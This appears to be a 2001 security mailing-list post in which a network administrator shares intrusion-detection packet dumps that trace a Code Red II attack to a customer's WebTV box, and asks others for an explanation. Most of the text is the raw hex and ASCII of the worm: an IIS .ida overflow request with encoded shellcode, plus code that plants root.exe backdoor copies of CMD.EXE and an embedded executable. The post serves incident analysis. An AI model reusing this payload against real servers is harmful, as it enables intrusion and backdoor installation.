-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 While the following dumps seem all too familiar by now, keep reading as the source of these are an unlikely source. [**] IDS552 web-iis_IIS ISAPI Overflow ida [**] 08/10-13:39:51.066030 204.x.x.x:1735 -> 204.x.x.x:80 TCP TTL:125 TOS:0x0 ID:12845 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8246A40B Ack: 0x49256627 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+=+ [**] IIS CodeRed v2 overflow root.exe [**] 08/10-13:39:51.343109 204.x.x.x:1735 -> 204.x.x.x:80 TCP TTL:125 TOS:0x0 ID:12846 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8246A9BF Ack: 0x49256627 Win: 0x2238 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+=+ once the requests triggered the IDS, they were traced back to a user on our network. The user is a customer of webtv. Checking on the HiPerARC verified this via the login information. 100a63010@webtvf-ip-I3055 IP slot:8/mod:7 ENA DYN 204.x.x.x/H While working too a very small degree with Microsoft they dropped the issue..so I for one am left with a puzzle on my hands. While the person is using our network equipment to access the net, the are not really a customer of ours. I reffered this information to Microsoft who would not look into it nor question the customer. I took it upon myself to contact the customer. The only real information they were able to offer me was that their WebTV box was acting with on the day of the detect I had and a few days later..after rebooting the box the customer had no further problems. This is a WebTV device, not WebTV for Windows. Anyone ever see anything similar to this, or have some decent explanation besides spoofing or tcp hijacking as Microsoft already gave us those and we have since disregarded those due to our network setup. - -Keith -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBO4qrpuGTq6qVSXTQEQL//wCgolNxyde+hBW9KBedD/W6FHdOb2wAoLAU pXmAtCmmBLMgLVzWQM9RaePp =PTuG -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 13:59:21 PDT